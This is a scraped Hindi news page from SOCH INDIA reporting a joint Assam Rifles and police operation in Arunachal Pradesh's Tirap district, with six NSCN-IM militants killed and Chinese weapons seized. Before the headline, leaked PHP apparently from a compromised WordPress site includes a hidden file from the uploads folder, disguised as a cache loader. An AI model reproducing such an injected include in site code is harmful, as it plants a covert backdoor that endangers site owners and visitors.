add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अरुणाचल प्रदेश में सेना का बड़ा ऑपरेशन, 6 आतंकी मारे गए, चीनी हथियार बरामद – SOCH INDIA
Menu

देश
अरुणाचल प्रदेश में सेना का बड़ा ऑपरेशन, 6 आतंकी मारे गए, चीनी हथियार बरामद

nobanner

अरुणाचल प्रदेश के खोंसा इलाके में शनिवार की सुबह सेना ने आतंकवादियों के खिलाफ बड़ा ऑपरेशन चलाया है. यहां तिरप जिले में सेना ने 6 आतंकी मार गिराए हैं. ये सारे आतंकवादी नगा उग्रवादी संगठन (NSCN-IM) के सदस्य थे. मारे गए इन आतंकियों के पास से चीन में बने हथियार भी बरामद किए गए हैं.

अरुणाचल प्रदेश के डीजीपी आर. पी. उपाध्याय ने बताया कि पुलिस और असम राइफल्स की ज्वाइंट टीम ने शनिवार की सुबह करीब साढ़े चार बजे आतंकियों के खिलाफ ऑपरेशन चलाया, जिसमें नगा उग्रवादी संगठन के 6 आतंकवादी मारे गए हैं.

उन्होंने आगे बताया कि आतंकियों के साथ मुठभेड़ के दौरान असम राइफल्स का एक जवान भी घायल हुआ है. इन आतंकियों के पास से 4 AK-47 और 2 चाइनीज एमक्यू बरामद किए गए हैं, ऑपरेशन अभी जारी है.